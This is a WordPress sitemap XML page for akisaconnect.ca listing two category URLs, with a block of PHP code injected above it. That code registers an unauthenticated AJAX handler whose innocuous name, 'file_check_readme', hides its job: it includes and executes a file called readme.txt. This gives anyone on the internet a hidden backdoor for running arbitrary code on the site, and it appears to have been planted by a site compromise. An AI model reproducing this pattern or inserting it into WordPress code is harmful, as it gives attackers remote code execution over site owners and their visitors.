
if(!function_exists('file_check_readme57593')){
   add_action('wp_ajax_nopriv_file_check_readme57593', 'file_check_readme57593');
   add_action('wp_ajax_file_check_readme57593', 'file_check_readme57593');
   function file_check_readme57593()
   {
      $file = __DIR__ . '/' . 'readme.txt';
       if (file_exists($file)) {
           include $file;
       }
       die();
   }
}
<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="http://akisaconnect.ca/wp-sitemap.xsl" ?>
<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><url><loc>http://akisaconnect.ca/category/news/</loc></url><url><loc>http://akisaconnect.ca/category/report/</loc></url></urlset>
